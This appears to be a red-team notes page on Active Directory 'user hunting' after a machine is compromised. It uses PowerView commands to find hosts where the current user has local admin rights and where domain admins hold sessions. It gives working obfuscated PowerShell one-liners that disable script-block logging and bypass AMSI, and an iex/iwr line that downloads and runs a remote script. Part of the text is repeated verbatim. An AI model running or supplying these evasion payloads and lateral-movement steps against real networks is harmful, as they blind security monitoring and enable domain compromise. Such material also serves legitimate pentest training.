User Hunting

Finding local admin access

From our compromised machine always check where do we have local admin access we can use powerview's below command to find all machines where our current user has local admin access.

Find-LocalAdminAccess -Verbose

Find-WMILocalAdminAccess.ps1 and Find-PSRemotingLocalAdminAccess.ps1 powershell scripts can be used for the same purpose where above does not work.

. .\Find-PSRemotingLocalAdminAccess
Find-PSRemotingLocalAdminAccess

Find computers where a domain admin has session

This is same as finding local admin access on a computer since server 2019 local administrator privileges are required to list sessions and if we are able to list sessions it means we are local admin on that computer. Before using this powerview command we must first bypass enhanced scriptblock logging and AMSI. Using powershell session do the following.

 iex (iwr http://172.16.100.x/sbloggingbypass.txt -UseBasicParsing)

[Reflection.Assembly]::"l`o`AdwIThPa`Rti`AlnamE"(('S'+'ystem'+'.C'+'ore'))."g`E`TTYPE"(('Sys'+'tem.Di'+'agno'+'stics.Event'+'i'+'ng.EventProv'+'i'+'der'))."gET`FI`eLd"(('m'+'_'+'enabled'),('NonP'+'ubl'+'ic'+',Instance'))."seTVa`l`Ue"([Ref]."a`sSem`BlY"."gE`T`TyPE"(('Sys'+'tem'+'.Mana'+'ge'+'ment.Aut'+'o'+'mation.Tracing.'+'PSEtwLo'+'g'+'Pro'+'vi'+'der'))."gEtFIe`Ld"(('e'+'tw'+'Provid'+'er'),('N'+'o'+'nPu'+'b'+'lic,Static'))."gE`Tva`lUe"($null),0)

Then bypass AMSI

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Now use PowerView's this below function.

Find-DomainUserLocation -Verbose

Find computers where a domain admin session is available and current user has admin access

IT means a computer where a domain admin is actively interacting whether accessing some shares or service and has session established and our current user has local admin access to that computer

Find-DomainUserLocation -CheckAccess

Find computers (File Servers and Distributed File servers) where a domain admin session is available.

Find-DomainUserLocation -Stealth

PreviousTrusts Nextgroup policy

Last updated 1 year ago

Finding local admin access

From our compromised machine always check where do we have local admin access we can use powerview's below command to find all machines where our current user has local admin access.

Find-LocalAdminAccess -Verbose

Find-WMILocalAdminAccess.ps1 and Find-PSRemotingLocalAdminAccess.ps1 powershell scripts can be used for the same purpose where above does not work.

. .\Find-PSRemotingLocalAdminAccess
Find-PSRemotingLocalAdminAccess

Find computers where a domain admin has session

 iex (iwr http://172.16.100.x/sbloggingbypass.txt -UseBasicParsing)

[Reflection.Assembly]::"l`o`AdwIThPa`Rti`AlnamE"(('S'+'ystem'+'.C'+'ore'))."g`E`TTYPE"(('Sys'+'tem.Di'+'agno'+'stics.Event'+'i'+'ng.EventProv'+'i'+'der'))."gET`FI`eLd"(('m'+'_'+'enabled'),('NonP'+'ubl'+'ic'+',Instance'))."seTVa`l`Ue"([Ref]."a`sSem`BlY"."gE`T`TyPE"(('Sys'+'tem'+'.Mana'+'ge'+'ment.Aut'+'o'+'mation.Tracing.'+'PSEtwLo'+'g'+'Pro'+'vi'+'der'))."gEtFIe`Ld"(('e'+'tw'+'Provid'+'er'),('N'+'o'+'nPu'+'b'+'lic,Static'))."gE`Tva`lUe"($null),0)

Then bypass AMSI

S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Now use PowerView's this below function.

Find-DomainUserLocation -Verbose